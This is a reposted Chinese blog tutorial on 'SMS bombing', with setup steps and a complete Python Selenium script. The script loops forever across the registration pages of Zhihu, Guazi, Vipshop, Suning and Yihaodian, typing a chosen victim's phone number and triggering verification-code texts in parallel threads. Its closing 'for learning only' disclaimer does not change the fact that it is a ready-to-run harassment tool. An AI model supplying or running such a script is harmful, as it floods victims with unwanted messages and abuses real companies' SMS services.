手把手教你实现"短信轰炸"
Posted chenqiwei
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了手把手教你实现"短信轰炸"相关的知识,希望对你有一定的参考价值。
手把手教你实现"短信轰炸"
我这里采用简单易懂的语言--"Python3"来实现
实现前的准备:
1,电脑,谷歌浏览器
2,python3环境
3,chromedrive相应的版本
1 , 当然需要下载python的咯--> Python最新源码,二进制文档,新闻资讯等可以在Python的官网查看到:
Python官网:https://www.python.org/你可以在以下链接中下载 Python 的文档,你可以下载 html、PDF 和 PostScript 等格式的文档。
Python文档下载地址:https://www.python.org/doc/ 我这下载的是最新版本python3.7
你们下载后按照一步一步的next就差不多了没什么难度和特别的地方,然后你把python追加到你的系统变量(右击电脑->高级设置->环境配置)的path中就可以了.
2,你需要自动的去实现浏览器页面的事件你当然必不可少的需要安装chromedriver啦,下面给你详细的安装步骤
点击下面的连接下载chromedrive,
http://chromedriver.storage.googleapis.com/index.html
你会看到很多版本,这个版本要对应你的谷歌浏览器的版本哟,大致的就可以咯哟,现在谷歌最新版本应该是73.0.3683.
下载的安装目录一定要在你的谷歌浏览器的目录里面,否者是没用的哟,,我把我的贴上去了
一切准备就绪了,那就打开你的python,在这里我们需要安装三个python包,如果你是linux操作系统可能比较方便安装引入查看相应的库和,不过在windows下你可以定位到你python下的script的文件下按住shift键右击在此处打开命令不过你用cd去定位也是一样的哟,pip install 包名 这样既可以了哟!如果你觉得慢的话,,你也可以直接在网上下载到python文件里面去哟,再说的话你直接在相关的python(pycharm)编辑器里面的设置去引入包也是一样的,我在这里就不累赘叙说了.
3,话不多说->直接上代码:
1 from selenium import webdriver
2 import time
3 from threading import Thread
4
5 class HongZha(object):
6 def __init__(self):
7 self.phone = "12345678909"#你要轰炸的电话号码
8 self.num = 0
9 def send_yzm(self,button,name):
10 button.click()
11 self.num+=1
12 print(" 第次 发送成功 ".format(self.phone,self.num,name))
13 time.sleep(2)
14 def zhihu(self,name):
15 while True:#下面这行是刚刚叙说的chromedrive的安装路径
16
17 driver = webdriver.Chrome("C:\\Program Files (x86)\\Google\\Chrome\\Application\\chromedriver.exe")
18 driver.get("https://www.zhihu.com/question/39993344")
19 driver.find_element_by_xpath ( "//button[@class=‘Button Button--primary Button--blue‘]" ).click ()
20 time.sleep(2)
21 tel = driver.find_element_by_xpath("//input[@placeholder=‘手机号‘]")
22 tel.send_keys(self.phone)
23 button = driver.find_element_by_xpath ( "//button[@class=‘Button CountingDownButton SignFlow-smsInputButton Button--plain‘]" )
24 self.send_yzm(button,name)
25 driver.quit ()
26 def guazi(self,name):
27 while True:
28 driver = webdriver.Chrome("C:\\Program Files (x86)\\Google\\Chrome\\Application\\chromedriver.exe")
29 driver.get("https://www.guazi.com/www/bj/buy")
30 a_btn = driver.find_element_by_xpath ( "//a[@class=‘uc-my‘]" )
31 a_btn.click()
32 time.sleep(2)
33 tel = driver.find_element_by_xpath("//input[@placeholder=‘请输入您的手机号码‘]")
34 tel.send_keys( self.phone )
35 button = driver.find_element_by_xpath("//button[@class=‘get-code‘]")
36 self.send_yzm(button,name)
37 driver.quit()
38 def wphui(self,name):
39 while True:
40 driver = webdriver.Chrome("C:\\Program Files (x86)\\Google\\Chrome\\Application\\chromedriver.exe")
41 driver.get ( "https://passport.vip.com/register?src=https%3A%2F%2Fwww.vip.com%2F" )
42 tel = driver.find_element_by_xpath ( "//input[@placeholder=‘请输入手机号码‘]" )
43 tel.send_keys ( self.phone )
44 driver.find_element_by_xpath ( "//input[@id=‘J_mobile_code‘]" ).click()
45 button = driver.find_element_by_xpath (
46 "//a[@class=‘ui-btn-medium btn-verify-code ui-btn-secondary‘]" )
47 self.send_yzm ( button,name )
48 driver.quit ()
49 def suning(self,name):
50 while True:
51 driver = webdriver.Chrome("C:\\Program Files (x86)\\Google\\Chrome\\Application\\chromedriver.exe")
52 driver.get ( "https://reg.suning.com/person.do" )
53 driver.find_element_by_xpath("//a[@class=‘agree-btn‘]").click()
54 tel = driver.find_element_by_xpath ( "//input[@id=‘mobileAlias‘]")
55 tel.send_keys ( self.phone )
56 button = driver.find_element_by_xpath (
57 "//a[@id=‘sendSmsCode‘]" )
58 self.send_yzm ( button,name )
59 driver.quit ()
60 def yhd(self,name):
61 while True:
62 driver = webdriver.Chrome("C:\\Program Files (x86)\\Google\\Chrome\\Application\\chromedriver.exe")
63 driver.get ( "https://passport.yhd.com/passport/register_input.do" )
64 driver.find_element_by_xpath ( "//input[@id=‘userName‘]" ).send_keys("我的女神")
65 tel = driver.find_element_by_xpath ( "//input[@id=‘phone‘]" )
66 tel.send_keys ( self.phone )
67 time.sleep(2)
68 button = driver.find_element_by_xpath (
69 "//a[@class=‘receive_code fl same_code_btn r_disable_code ‘]" )
70 #button.click()
71 time.sleep(1)
72 self.send_yzm ( button,name )
73 driver.quit ()
74 if __name__ == ‘__main__‘:
75 hongzha = HongZha()
76 zhihu = Thread(target=hongzha.zhihu,args=("知乎",))
77 guazi = Thread ( target=hongzha.guazi,args=("瓜子",))
78 wphui = Thread(target=hongzha.wphui,args=("唯品会",))
79 suning = Thread(target=hongzha.suning,args=("苏宁",))
80 yhd = Thread( target=hongzha.yhd,args=("一号店",))
然后运行结果我就不弄太多,因为是我自己的手机测试的,
我做的处理防止拿我手机号来轰炸!
zhihu.start()
guazi.start()
wphui.start()
suning.start()
yhd.start()
在这里申明:我只提供技术上的学习讨论,不能来搞商业事情,,小编概不负任何责任....声明: 你们拿来做的任何事情与小编无关!
下篇手把手教你们如何爬取整个小说网站并且实现小说的"语音播放".
扫码公众号--回复“短信轰炸”获取源码:
以上是关于手把手教你实现"短信轰炸"的主要内容,如果未能解决你的问题,请参考以下文章